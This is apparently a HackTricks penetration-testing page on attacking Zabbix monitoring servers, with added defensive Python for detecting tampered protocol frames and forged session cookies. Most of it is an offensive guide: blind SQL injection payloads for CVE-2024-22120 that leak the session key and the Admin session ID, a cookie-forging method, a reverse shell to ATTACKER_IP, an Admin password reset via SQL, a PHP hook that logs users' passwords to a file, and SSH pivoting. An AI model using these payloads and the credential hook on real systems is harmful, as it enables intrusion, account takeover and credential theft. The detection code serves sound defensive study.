Zabbix Security

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Zabbix is a monitoring platform that exposes a web UI (usually behind Apache/Nginx) and a server component that also speaks the Zabbix protocol on TCP/10051 (server/trapper), with the agent listening on TCP/10050. During engagements you may encounter:

  • Web UI: HTTP(S) virtual host such as zabbix.example.tld
  • Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)
  • Zabbix agent port: 10050/tcp

Key cookie structure: zbx_session is the Base64 of a compact JSON object that includes at least sessionid, serverCheckResult, serverCheckTime and sign. sign is an HMAC over the JSON payload.

Recent Zabbix versions compute the cookie as follows:

  • data JSON: {"sessionid":"<32-hex>","serverCheckResult":true,"serverCheckTime":<unix_ts>}
  • sign: HMAC-SHA256(key=session_key, data=JSON string of data sorted by keys with compact separators)
  • Final cookie: Base64(JSON_with_sign)

If you can obtain the global session_key and a valid Admin sessionid, you can forge a valid Admin cookie offline and authenticate to the UI.

CVE-2024-22120: Time-based blind SQLi in the Zabbix Server audit log

Affected versions (as publicly documented):

  • 6.0.0–6.0.27, 6.4.0–6.4.12, 7.0.0alpha1

Vulnerability summary:

  • When a Script execution is recorded in the Zabbix Server audit log, the clientip field is not sanitized and is concatenated into the SQL statement, allowing a time-based blind SQLi through the server component.
  • It can be exploited by sending a crafted "command" request to the Zabbix server port 10051 using a valid low-privileged sessionid, a hostid the user can access, and a permitted scriptid.

Prerequisites and discovery notes:

  • sessionid: From guest/login in the web UI, decode zbx_session (Base64) to obtain the sessionid.
  • hostid: Look it up through web UI requests (e.g., Monitoring → Hosts) or intercept them with a proxy; a common default is 10084.
  • scriptid: Only scripts authorized for the current role will run; confirm by inspecting the script menu/AJAX responses. Defaults such as 1 or 2 are often allowed; 3 may be denied.

Exploitation flow

  1. Trigger the audit insert with SQLi in clientip
  • Connect to TCP/10051 and send a Zabbix framed message with request="command" including sid, hostid, scriptid, and clientip set to an SQL expression that the server will concatenate and evaluate.

Minimal message fields (JSON body):

```json
{
  "request": "command",
  "sid": "<low-priv-sessionid>",
  "scriptid": "1",
  "clientip": "' + (SQL_PAYLOAD) + '",
  "hostid": "10084"
}
```

The full wire format is: "ZBXD\x01" + 8-byte little-endian length + UTF-8 JSON. You can use pwntools or your own socket code to frame it.
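From the defensive side, the same framing can be parsed to spot abuse of this request type. The following is an added Python example (not code from this page or from Zabbix) that walks a byte stream of ZBXD\x01 frames laid out as described above and flags request="command" messages whose clientip is not a plain IP literal, which is exactly the field the vulnerable audit INSERT concatenates. The 8-byte little-endian length follows this page's description, and the sample traffic is constructed.

```python
import ipaddress
import json
import struct

ZBX_HDR = b"ZBXD\x01"   # 5-byte magic + protocol flag, as described above
HDR_LEN = 5 + 8         # magic followed by the 8-byte little-endian body length

def build_zbx_frame(obj) -> bytes:
    """Frame a JSON object as the page describes (used here only to build the sample)."""
    body = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    return ZBX_HDR + struct.pack("<Q", len(body)) + body

def iter_zbx_frames(stream: bytes):
    """Yield the decoded JSON body of each consecutive ZBXD frame in a byte stream."""
    off = 0
    while off < len(stream):
        if stream[off:off + 5] != ZBX_HDR or off + HDR_LEN > len(stream):
            raise ValueError(f"bad or truncated ZBXD header at offset {off}")
        (length,) = struct.unpack_from("<Q", stream, off + 5)
        body = stream[off + HDR_LEN:off + HDR_LEN + length]
        if len(body) < length:
            raise ValueError(f"truncated frame body at offset {off}")
        yield json.loads(body.decode("utf-8"))
        off += HDR_LEN + length

def suspicious_command_requests(stream: bytes) -> list:
    """Report request=command messages whose clientip is not an IP literal; the
    vulnerable path concatenates clientip into the audit INSERT verbatim."""
    findings = []
    for idx, msg in enumerate(iter_zbx_frames(stream)):
        if not isinstance(msg, dict) or msg.get("request") != "command":
            continue
        clientip = msg.get("clientip", "")
        try:
            ipaddress.ip_address(str(clientip))   # raises ValueError for anything else
        except ValueError:
            findings.append({"frame": idx, "sid": msg.get("sid"),
                             "scriptid": msg.get("scriptid"), "clientip": clientip})
    return findings

# Constructed sample traffic (not a real capture): a benign command, an unrelated
# agent message, and a command whose clientip carries SQL instead of an address.
SAMPLE_STREAM = (
    build_zbx_frame({"request": "command", "sid": "a" * 32, "scriptid": "1",
                     "clientip": "10.0.0.5", "hostid": "10084"})
    + build_zbx_frame({"request": "active checks", "host": "web01"})
    + build_zbx_frame({"request": "command", "sid": "a" * 32, "scriptid": "1",
                       "clientip": "' AND sleep(10) AND '", "hostid": "10084"})
)
```

Feeding the server's own 10051 traffic (or a pcap re-assembled into a byte string) through suspicious_command_requests gives one finding per tampered command request, with the sid and scriptid that were used.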

  2. Time-bruteforce secrets via conditional sleep

Use conditional expressions to leak hex-encoded secrets one character at a time by measuring the response time. Examples that have worked in practice:

  • Leak the global session_key from config:

```sql
(select CASE WHEN (ascii(substr((select session_key from config),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)
```

  • Leak the Admin session_id (userid=1) from sessions:

```sql
(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)
```

Notes:

  • charset: [0-9a-f]; both secrets are 32 hex chars long
  • Choose T_TRUE >> T_FALSE (e.g., 10 vs 1) and measure wall-clock time for each attempt
  • Make sure your scriptid is authorized for the user; otherwise no audit row is generated and the timing will not work
  3. Forge the Admin cookie

Once you have:

  • session_key: 32-hex from config.session_key
  • admin_sessionid: 32-hex from sessions.sessionid for userid=1

Compute:

  • sign = HMAC_SHA256(key=session_key, data=json.dumps({sessionid, serverCheckResult:true, serverCheckTime:now}, sorted by key, compact))
  • zbx_session = Base64(JSON_with_sign)

Set the zbx_session cookie to this value and GET /zabbix.php?action=dashboard.view to confirm Admin access.
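As a companion to the cookie layout from the Overview and the computation in step 3, here is an added Python example (not code from this page or from Zabbix) that decodes a zbx_session cookie and validates its sign against a given session_key, so a defender reviewing captured cookies can separate well-formed signed ones from tampered or unsigned ones. The HMAC input follows the formula given on this page; the key, sessionid and timestamp below are constructed demo values.

```python
import base64
import hashlib
import hmac
import json
import re

SESSION_ID_RE = re.compile(r"^[0-9a-f]{32}$")   # sessionid is 32 hex chars

def sign_session_data(data: dict, session_key: str) -> str:
    """HMAC-SHA256 hex digest over compact, key-sorted JSON of the unsigned fields."""
    msg = json.dumps(data, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return hmac.new(session_key.encode("utf-8"), msg, hashlib.sha256).hexdigest()

def build_zbx_session(sessionid: str, session_key: str, check_time: int) -> str:
    """Produce a cookie in the documented layout (used here to create a reference value)."""
    data = {"sessionid": sessionid, "serverCheckResult": True, "serverCheckTime": check_time}
    signed = dict(data, sign=sign_session_data(data, session_key))
    return base64.b64encode(json.dumps(signed, separators=(",", ":")).encode("utf-8")).decode()

def verify_zbx_session(cookie: str, session_key: str) -> dict:
    """Decode a zbx_session cookie and validate its sign.
    Returns {"valid": bool, "reason": str, "sessionid": str or None}."""
    try:
        payload = json.loads(base64.b64decode(cookie, validate=True))
    except ValueError:   # binascii.Error, UnicodeDecodeError and JSONDecodeError derive from it
        return {"valid": False, "reason": "not base64/JSON", "sessionid": None}
    if not isinstance(payload, dict) or not isinstance(payload.get("sign"), str):
        return {"valid": False, "reason": "missing sign", "sessionid": None}
    data = {k: v for k, v in payload.items() if k != "sign"}
    sid = data.get("sessionid")
    if not isinstance(sid, str) or not SESSION_ID_RE.match(sid):
        return {"valid": False, "reason": "malformed sessionid", "sessionid": sid}
    # Constant-time comparison so the check itself does not leak the expected sign
    expected = sign_session_data(data, session_key)
    if not hmac.compare_digest(payload["sign"].encode("utf-8"), expected.encode("utf-8")):
        return {"valid": False, "reason": "bad sign", "sessionid": sid}
    return {"valid": True, "reason": "ok", "sessionid": sid}

# Constructed demo values (not real secrets)
DEMO_KEY = "0123456789abcdef0123456789abcdef"
DEMO_SID = "ffffffffffffffffffffffffffffffff"
DEMO_COOKIE = build_zbx_session(DEMO_SID, DEMO_KEY, 1700000000)
```

A cookie whose sign verifies under the instance's session_key but whose sessionid is absent from the sessions table is the signature of an offline forge with a leaked key, which is the scenario this CVE leads to.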

Ready-made tooling

  • A public PoC automates the session_key and admin sessionid brute force as well as cookie forging; it requires pwntools and requests.
  • Typical parameters include: --ip (FQDN of the UI), --port 10051, --sid (low-priv), --hostid, and optionally a known --admin-sid to skip the brute force.

RCE via Script execution (post-Admin)

Once you have Admin access in the UI, you can execute predefined Scripts against monitored hosts. If agents/hosts execute script commands locally, this results in code execution on those systems (often as the zabbix user on Linux hosts):

  • Quick check: run id to confirm the user context
  • Reverse shell example:

```bash
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'
```

TTY upgrade (Linux):

```bash
script /dev/null -c bash
# background with Ctrl+Z, then on the attacker terminal:
stty raw -echo; fg
reset
```

If you have DB access, an alternative to cookie forging is resetting the Admin password to the documented bcrypt of "zabbix":

```sql
UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';
```

Credential capture via login hook (post-exploitation)

If file writes are possible on the web UI server, you can temporarily add a logging snippet to /usr/share/zabbix/index.php, next to the form-based login branch, to capture credentials:

```php
// login via form
if (hasRequest('enter') && CWebUser::login(getRequest('name', ZBX_GUEST_USER), getRequest('password', ''))) {
    $user = $_POST['name'] ?? '??';
    $password = $_POST['password'] ?? '??';
    $f = fopen('/dev/shm/creds.txt', 'a+'); fputs($f, "$user:$password\n"); fclose($f);
    CSessionHelper::set('sessionid', CWebUser::$data['sessionid']);
}
```

Users authenticate normally; read /dev/shm/creds.txt later. Remove the hook when done.

Pivoting to internal services

Even if the service account's shell is /usr/sbin/nologin, adding an entry to its SSH authorized_keys and using -N -L allows local port-forwarding to loopback-only services (e.g., CI/CD on 8111):

```bash
ssh -i key user@host -N -L 8111:127.0.0.1:8111
```

For more tunneling techniques, see Tunneling and Port Forwarding.

Operational notes

  • Confirm the scriptid is allowed for the current role (guest may have a reduced set)
  • Timing brute force can be slow; cache the recovered admin sessionid and reuse it
  • JSON sent to 10051 must carry the ZBXD\x01 header and the little-endian length
